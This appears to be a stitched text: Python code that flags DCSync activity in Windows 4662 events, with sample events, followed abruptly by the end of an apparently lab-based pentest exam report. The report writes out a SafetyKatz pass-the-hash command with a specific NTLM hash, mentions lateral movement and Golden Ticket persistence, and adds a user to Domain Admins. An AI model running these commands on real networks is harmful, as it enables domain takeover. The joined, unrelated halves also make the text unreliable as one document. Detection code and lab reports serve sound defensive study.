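def is_dcsync_candidate(event: Dict[str, str], trusted=TRUSTED_REPLICATORS) -> bool:
    """True when a non-DC principal exercises a Get-Changes right with Control Access."""
    if event.get("EventID") != "4662":
        return False
    if int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
        return False
    rights = replication_rights_in(event.get("Properties", ""))
    if not any(r.startswith("DS-Replication-Get-Changes") for r in rights):
        return False
    return event.get("SubjectUserName", "").upper() not in trusted


def find_dcsync(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter a stream of parsed events down to DCSync candidates."""
    return [e for e in events if is_dcsync_candidate(e)]


# Constructed sample events using 4662 EventData field names.
SAMPLE_EVENTS = [
    {   # normal DC-to-DC replication: allowlisted
        "EventID": "4662", "SubjectUserName": "GLACIS-DC$", "SubjectDomainName": "GLACIS",
        "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # the report's DCSync: SYSTEM on PAWSRV, i.e. the PAWSRV$ machine account
        "EventID": "4662", "SubjectUserName": "PAWSRV$", "SubjectDomainName": "CITADEL",
        "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}",
    },
    {   # an ordinary property read: no Control Access bit, no replication right
        "EventID": "4662", "SubjectUserName": "studentuser", "SubjectDomainName": "CITADEL",
        "AccessMask": "0x10",
        "Properties": "",
    },
]
```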

With that I can open a PowerShell on our EXAMVM and use SafetyKatz again to
pass the hash:

.\SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:CITADEL /rc4:2e52650081016fcefc5c2100ddf1566c /run:cmd.exe" "exit"

This opens a CMD window as Administrator, from which we can winrs to CITADEL-DC.

We are now Domain Admins and have full control to do whatever we like, such as a
Golden Ticket attack for persistence.

Now as a final step I add studentuser to the Domain Admins group:

net group "Domain Admins" studentuser /add /domain

Conclusion
I have successfully achieved command execution on all the machines, thereby
accomplishing the passing requirement of the examination.
